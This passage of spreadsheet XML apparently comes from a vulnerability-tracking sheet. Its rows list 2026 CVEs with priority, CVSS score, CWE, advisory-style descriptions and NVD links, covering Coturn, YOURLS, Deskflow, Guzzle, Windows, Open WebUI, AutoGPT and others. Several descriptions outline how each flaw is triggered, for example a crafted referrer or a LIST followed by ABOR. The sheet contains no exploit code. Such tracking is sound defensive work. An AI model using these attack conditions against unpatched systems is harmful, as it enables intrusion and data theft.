      </c>
      <c r="J1743" s="5" t="inlineStr"/>
      <c r="K1743" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-195</t>
        </is>
      </c>
      <c r="L1743" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. From 4.5.2 through 4.14.0, when Coturn is started with --acme-redirect &lt;URL&gt; and exposes a plaintext-TCP listener, an unauthenticated remote client can send a single ordinary HTTP GET request and receive a 301 response whose Location header contains up to ~870 bytes of adjacent process heap memory. The leaked region is a recycled network receive buffer that is reused without being zeroed, so on a busy server it can contain data from other clients' requests (TURN credentials, OAuth tokens, relayed payloads). Root cause is a signed→unsigned conversion. This issue is fixed in version 4.15.0.</t>
        </is>
      </c>
      <c r="M1743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62959</t>
        </is>
      </c>
    </row>
    <row r="1744">
      <c r="A1744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63135</t>
        </is>
      </c>
      <c r="C1744" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1744" s="5" t="inlineStr"/>
      <c r="F1744" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1744" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1744" s="5" t="inlineStr"/>
      <c r="I1744" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1744" s="5" t="inlineStr"/>
      <c r="K1744" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1744" s="5" t="inlineStr">
        <is>
          <t>YOURLS is a self-hosted, customizable URL shortener written in PHP. From 1.5.1 until 1.10.4, YOURLS stores the HTTP Referer header through yourls_get_referrer(), yourls_sanitize_url_safe(), and yourls_log_redirect(), then aggregates the value in yourls-infos.php and passes the derived domain through yourls_get_domain(), yourls_stats_pie(), and yourls_google_array_to_data_table(). The chart builder concatenates labels into inline JavaScript without JavaScript-string escaping, so an unauthenticated attacker can poison the statistics of an existing short URL with a crafted referrer. When an administrator or public stats-page viewer opens the affected statistics page, attacker-controlled JavaScript executes in the YOURLS origin and can access admin-visible data, the API signature token, and privileged same-origin actions. This issue is fixed in version 1.10.4.</t>
        </is>
      </c>
      <c r="M1744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63135</t>
        </is>
      </c>
    </row>
    <row r="1745">
      <c r="A1745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63376</t>
        </is>
      </c>
      <c r="C1745" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1745" s="5" t="inlineStr"/>
      <c r="F1745" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1745" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1745" s="5" t="inlineStr"/>
      <c r="I1745" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1745" s="5" t="inlineStr"/>
      <c r="K1745" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1745" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">toml-node </t>
        </is>
      </c>
      <c r="M1745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63376</t>
        </is>
      </c>
    </row>
    <row r="1746">
      <c r="A1746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63407</t>
        </is>
      </c>
      <c r="C1746" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1746" s="5" t="inlineStr"/>
      <c r="F1746" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1746" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1746" s="5" t="inlineStr"/>
      <c r="I1746" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1746" s="5" t="inlineStr"/>
      <c r="K1746" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="L1746" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.0-rc.16, the Grav API plugin CorsMiddleware returns Access-Control-Allow-Origin: * and permissive OPTIONS responses for authenticated /api/v1 endpoints. JavaScript from any origin can submit an attacker-obtained JWT through the Authorization or X-API-Token header, read the authenticated response, and perform write operations with the token owner's privileges, enabling data exfiltration and account modification. This issue is fixed in version 1.0.0-rc.16.</t>
        </is>
      </c>
      <c r="M1746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63407</t>
        </is>
      </c>
    </row>
    <row r="1747">
      <c r="A1747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63409</t>
        </is>
      </c>
      <c r="C1747" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1747" s="5" t="inlineStr"/>
      <c r="F1747" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1747" s="5" t="inlineStr"/>
      <c r="H1747" s="5" t="inlineStr"/>
      <c r="I1747" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1747" s="5" t="inlineStr"/>
      <c r="K1747" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1747" s="5" t="inlineStr">
        <is>
          <t>Deskflow is a keyboard and mouse sharing app. From 1.17.0 until continuous build 1.26.0.296, a malicious Deskflow server can send an odd-length DSOP vector to ServerProxy::setOptions() in src/lib/client/ServerProxy.cpp, causing the missing value after the final option key to be read beyond the vector during the PacketStreamFilter::filterEvent to ServerProxy::handleData() to ServerProxy::parseHandshakeMessage() call chain and crash the connected client. This issue is fixed in continuous build 1.26.0.296.</t>
        </is>
      </c>
      <c r="M1747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63409</t>
        </is>
      </c>
    </row>
    <row r="1748">
      <c r="A1748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64380</t>
        </is>
      </c>
      <c r="C1748" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1748" s="5" t="inlineStr"/>
      <c r="F1748" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1748" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1748" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1748" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J1748" s="5" t="inlineStr"/>
      <c r="K1748" s="5" t="inlineStr"/>
      <c r="L1748" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: harden POSIX SID length parsing
posix_info_sid_size() reads sid[1] to obtain the subauthority count,
but its existing boundary check still accepts buffers with only one
remaining byte. Require two bytes before reading sid[1] so all client
paths that reuse the helper reject truncated POSIX SIDs safely.</t>
        </is>
      </c>
      <c r="M1748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64380</t>
        </is>
      </c>
    </row>
    <row r="1749">
      <c r="A1749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6485</t>
        </is>
      </c>
      <c r="C1749" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1749" s="5" t="inlineStr"/>
      <c r="F1749" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1749" s="5" t="inlineStr"/>
      <c r="H1749" s="5" t="inlineStr"/>
      <c r="I1749" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1749" s="5" t="inlineStr"/>
      <c r="K1749" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="L1749" s="5" t="inlineStr">
        <is>
          <t>UEFI BIOS embedded Shell could be used to bypass Secure Boot via shell commands or startup scripts.</t>
        </is>
      </c>
      <c r="M1749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6485</t>
        </is>
      </c>
    </row>
    <row r="1750">
      <c r="A1750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65832</t>
        </is>
      </c>
      <c r="C1750" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1750" s="5" t="inlineStr"/>
      <c r="F1750" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1750" s="5" t="inlineStr"/>
      <c r="H1750" s="5" t="inlineStr"/>
      <c r="I1750" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1750" s="5" t="inlineStr"/>
      <c r="K1750" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-129</t>
        </is>
      </c>
      <c r="L1750" s="5" t="inlineStr">
        <is>
          <t>Deskflow is a keyboard and mouse sharing app. Prior to continuous build 1.26.0.299, a remote unauthenticated Deskflow server can send kMsgDSetOptions (DSOP) values to ServerProxy::setOptions() in src/lib/client/ServerProxy.cpp so that the value following a modifier option poisons m_modifierTranslationTable, after which ServerProxy::translateKey() or ServerProxy::translateModifierMask() indexes the seven-row s_translationTable or s_masks arrays out of bounds, disclosing four bytes at an attacker-selected relative offset or crashing the connected client; an odd option count also causes an out-of-bounds OptionsList read. This issue is fixed in continuous build 1.26.0.299.</t>
        </is>
      </c>
      <c r="M1750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65832</t>
        </is>
      </c>
    </row>
    <row r="1751">
      <c r="A1751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67354</t>
        </is>
      </c>
      <c r="C1751" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1751" s="5" t="inlineStr"/>
      <c r="F1751" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1751" s="5" t="inlineStr"/>
      <c r="H1751" s="5" t="inlineStr"/>
      <c r="I1751" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1751" s="5" t="inlineStr"/>
      <c r="K1751" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L1751" s="5" t="inlineStr">
        <is>
          <t>guzzlehttp/guzzle versions before 7.15.1 contain an information disclosure vulnerability in RedirectMiddleware. When the optional allow_redirects.referer setting is enabled, the middleware copies the URI fragment (the portion after '#') from the referring request into the generated Referer header when following a same-scheme redirect (e.g., HTTPS to HTTPS). An attacker who controls the redirect destination can read this fragment from the incoming Referer header, potentially disclosing one-time login secrets, access tokens, state values, or other sensitive client data to a server never meant to receive it. The referer setting is disabled by default. Fixed in 7.15.1, which strips the fragment before generating the Referer value.</t>
        </is>
      </c>
      <c r="M1751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67354</t>
        </is>
      </c>
    </row>
    <row r="1752">
      <c r="A1752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67355</t>
        </is>
      </c>
      <c r="C1752" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1752" s="5" t="inlineStr"/>
      <c r="F1752" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1752" s="5" t="inlineStr"/>
      <c r="H1752" s="5" t="inlineStr"/>
      <c r="I1752" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1752" s="5" t="inlineStr"/>
      <c r="K1752" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L1752" s="5" t="inlineStr">
        <is>
          <t>guzzlehttp/guzzle versions before 7.15.1 fail to preserve host-only cookie scope, storing the request host in the Domain field instead of marking cookies as host-only. Attackers controlling child hosts can receive host-only cookies intended only for parent hosts, potentially disclosing session identifiers and authorization tokens when the same cookie jar is reused across trust boundaries.</t>
        </is>
      </c>
      <c r="M1752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67355</t>
        </is>
      </c>
    </row>
    <row r="1753">
      <c r="A1753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67398</t>
        </is>
      </c>
      <c r="C1753" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1753" s="5" t="inlineStr"/>
      <c r="F1753" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1753" s="5" t="inlineStr"/>
      <c r="H1753" s="5" t="inlineStr"/>
      <c r="I1753" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1753" s="5" t="inlineStr"/>
      <c r="K1753" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1753" s="5" t="inlineStr">
        <is>
          <t>Missing authorization vulnerability has been discovered in 2Checkout payment gateway of WHMCS from 8.13.0 before 8.13.8, from 9.0.0 before 9.0.8, all other EOL versions from 4.5.0. The vulnerability allows an unauthenticated user to get WHMCS customer's data via 2Checkout payment gateway's endpoint under specific conditions.</t>
        </is>
      </c>
      <c r="M1753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67398</t>
        </is>
      </c>
    </row>
    <row r="1754">
      <c r="A1754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67607</t>
        </is>
      </c>
      <c r="C1754" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1754" s="5" t="inlineStr"/>
      <c r="F1754" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1754" s="5" t="inlineStr"/>
      <c r="H1754" s="5" t="inlineStr"/>
      <c r="I1754" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1754" s="5" t="inlineStr"/>
      <c r="K1754" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1754" s="5" t="inlineStr">
        <is>
          <t>LightFTP 2.3.1 contains a residual race condition vulnerability (an incomplete fix for CVE-2024-11144) in the worker_thread_cleanup() function of ftpserv.c that allows remote unauthenticated attackers to destabilize or crash the daemon by triggering unsynchronized access to shared per-connection state without holding the required mutex lock. Attackers can send a data-transfer command such as LIST followed immediately by ABOR to exploit the missing synchronization on shared context and detached thread id reuse, resulting in daemon destabilization or crash which can lead to a denial of service. The 2.3.1 patch only narrowed the timing window (an extra re-check and reordered cleanup), it never added the missing lock, so the underlying race remains.</t>
        </is>
      </c>
      <c r="M1754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67607</t>
        </is>
      </c>
    </row>
    <row r="1755">
      <c r="A1755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69247</t>
        </is>
      </c>
      <c r="C1755" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1755" s="5" t="inlineStr"/>
      <c r="F1755" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1755" s="5" t="inlineStr">
        <is>
          <t>oracle, openssl, python</t>
        </is>
      </c>
      <c r="H1755" s="5" t="inlineStr"/>
      <c r="I1755" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1755" s="5" t="inlineStr"/>
      <c r="K1755" s="5" t="inlineStr">
        <is>
          <t>CWE-208, CWE-209</t>
        </is>
      </c>
      <c r="L1755" s="5" t="inlineStr">
        <is>
          <t>cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. From 44.0.0 until 50.0.0, pkcs7_decrypt_der, pkcs7_decrypt_pem, and pkcs7_decrypt_smime reported the outcome of decrypting a RecipientInfo's encryptedKey in several distinguishable ways, one of which disclosed the exact length recovered from the RSA operation. The same distinction was also observable by timing. An application that decrypts attacker-supplied EnvelopedData and reflects the outcome gives the attacker a Bleichenbacher oracle against the content-encryption key. Decryption ran as RSA PKCS#1 v1.5 decrypt of encryptedKey, build an AES cipher from the result, then AES-CBC decrypt and PKCS#7 unpad. Invalid RSA padding, a valid padding with a bad key length, a correct length with a wrong key, and the real key each failed or succeeded differently. Case 1 is reachable only where the linked library lacks implicit rejection: OpenSSL 3.0 and 3.1, LibreSSL, and BoringSSL. Exploitation requires a service that auto-decrypts untrusted EnvelopedData matching the victim certificate and answers adaptively at high volume, such as an S/MIME gateway or mail filter. This issue is fixed in 50.0.0.</t>
        </is>
      </c>
      <c r="M1755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69247</t>
        </is>
      </c>
    </row>
    <row r="1756">
      <c r="A1756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69820</t>
        </is>
      </c>
      <c r="C1756" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1756" s="5" t="inlineStr"/>
      <c r="F1756" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1756" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1756" s="5" t="inlineStr"/>
      <c r="I1756" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1756" s="5" t="inlineStr"/>
      <c r="K1756" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1756" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69820</t>
        </is>
      </c>
    </row>
    <row r="1757">
      <c r="A1757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69846</t>
        </is>
      </c>
      <c r="C1757" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1757" s="5" t="inlineStr"/>
      <c r="F1757" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1757" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1757" s="5" t="inlineStr"/>
      <c r="I1757" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1757" s="5" t="inlineStr"/>
      <c r="K1757" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1757" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t>
        </is>
      </c>
    </row>
    <row r="1758">
      <c r="A1758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69874</t>
        </is>
      </c>
      <c r="C1758" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1758" s="5" t="inlineStr"/>
      <c r="F1758" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1758" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1758" s="5" t="inlineStr"/>
      <c r="I1758" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1758" s="5" t="inlineStr"/>
      <c r="K1758" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1758" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t>
        </is>
      </c>
    </row>
    <row r="1759">
      <c r="A1759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69906</t>
        </is>
      </c>
      <c r="C1759" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1759" s="5" t="inlineStr"/>
      <c r="F1759" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1759" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1759" s="5" t="inlineStr"/>
      <c r="I1759" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1759" s="5" t="inlineStr"/>
      <c r="K1759" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1759" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t>
        </is>
      </c>
    </row>
    <row r="1760">
      <c r="A1760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70486</t>
        </is>
      </c>
      <c r="C1760" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1760" s="5" t="inlineStr"/>
      <c r="F1760" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1760" s="5" t="inlineStr"/>
      <c r="H1760" s="5" t="inlineStr"/>
      <c r="I1760" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1760" s="5" t="inlineStr"/>
      <c r="K1760" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-79</t>
        </is>
      </c>
      <c r="L1760" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.0, the terminal file-preview serveUrl iframe branch always granted allow-same-origin together with allow-scripts for HTML files served from the application origin. Any authenticated user with access to a configured terminal server could cause script in a previewed file to run in the Open WebUI origin, read the victim's session token from localStorage, and take over the account, with possible server-side code execution if the victim was an admin or held workspace.functions. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M1760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70486</t>
        </is>
      </c>
    </row>
    <row r="1761">
      <c r="A1761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71315</t>
        </is>
      </c>
      <c r="C1761" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1761" s="5" t="inlineStr"/>
      <c r="F1761" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1761" s="5" t="inlineStr"/>
      <c r="H1761" s="5" t="inlineStr"/>
      <c r="I1761" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1761" s="5" t="inlineStr"/>
      <c r="K1761" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-863</t>
        </is>
      </c>
      <c r="L1761" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 3.21.7 until 3.21.10 and 4.5.1, mixed-case routeRules keys can fail to match case-folded lookups when router.options.sensitive is false and drop appMiddleware authorization gates. This is caused by an incomplete fix for CVE-2026-53721. This issue is fixed in 3.21.10 and 4.5.1.</t>
        </is>
      </c>
      <c r="M1761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71315</t>
        </is>
      </c>
    </row>
    <row r="1762">
      <c r="A1762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72922</t>
        </is>
      </c>
      <c r="C1762" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1762" s="5" t="inlineStr"/>
      <c r="F1762" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1762" s="5" t="inlineStr"/>
      <c r="H1762" s="5" t="inlineStr"/>
      <c r="I1762" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1762" s="5" t="inlineStr"/>
      <c r="K1762" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1762" s="5" t="inlineStr">
        <is>
          <t>AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Prior to 0.6.70, AutoGPT's autogpt_platform/backend/backend/api/features/integrations/router.py webhook_ingress_generic route selected get_webhook_manager(provider) from the untrusted provider URL segment without verifying webhook.provider, allowing a request to /compass/webhooks/{webhook_id}/ingress to use CompassWebhookManager's inherited no-op BaseWebhooksManager.verify_signature instead of GenericWebhooksManager.verify_signature, bypass X-Webhook-Secret for a configured secret_token, and execute a generic webhook graph as its owner. This issue is fixed in version 0.6.70.</t>
        </is>
      </c>
      <c r="M1762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72922</t>
        </is>
      </c>
    </row>
    <row r="1763">
      <c r="A1763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72958</t>
        </is>
      </c>
      <c r="C1763" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1763" s="5" t="inlineStr"/>
      <c r="F1763" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1763" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1763" s="5" t="inlineStr"/>
      <c r="I1763" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1763" s="5" t="inlineStr"/>
      <c r="K1763" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1763" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1763" s="6" t="inlineStr">
        <is>
